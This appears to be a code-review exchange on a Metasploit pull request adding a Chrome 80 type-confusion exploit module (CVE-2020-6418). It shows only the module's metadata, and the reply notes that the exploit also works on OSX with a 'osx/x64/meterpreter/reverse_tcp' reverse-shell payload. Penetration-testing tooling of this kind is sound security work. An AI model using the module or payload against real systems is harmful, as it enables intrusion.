modules/exploits/multi/browser/chrome_jscreate_sideeffect.rb

```diff
@@ -0,0 +1,370 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ManualRanking
+
+  include Msf::Post::File
+  include Msf::Exploit::Remote::HttpServer
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'Google Chrome 80 JSCreate side-effect type confusion exploit',
+      'Description'    => %q{
+      This module exploits an issue in Chrome 80.0.3987.87 (64 bit) on Windows 10 --no-sandbox.
+      },
+      'License'        => MSF_LICENSE,
+      'Author'         => [
+          'saelo', # discovery
+          'István Kurucsai', # exploit
+          'timwr', # metasploit copynpasta
+        ],
+      'References'     => [
+          ['CVE', '2020-6418'],
+          ['URL', 'https://bugs.chromium.org/p/chromium/issues/detail?id=1053604'],
+          ['URL', 'https://blog.exodusintel.com/2020/02/24/a-eulogy-for-patch-gapping'],
+          ['URL', 'https://ray-cp.github.io/archivers/browser-pwn-cve-2020-6418%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90'],
+        ],
+      'Arch'           => [ ARCH_X64 ],
+      'Platform'       => ['windows','osx'],
```

Comment:
```suggestion
      'Platform'       => ['windows'],
```
I'm assuming osx isn't a valid platform if the description specifies Windows 10?

Reply:
So this does work identically on OSX for the same version (https://dl.google.com/release2/chrome/AJkrrB9igve6Mz4STD5utjA_80.0.3987.87/GoogleChrome-80.0.3987.87.dmg)
`/Applications/Google\ Chrome.app/Contents/MacOS/Google\ Chrome --no-sandbox`).
You'll need an OSX payload, e.g:
`set payload osx/x64/meterpreter/reverse_tcp`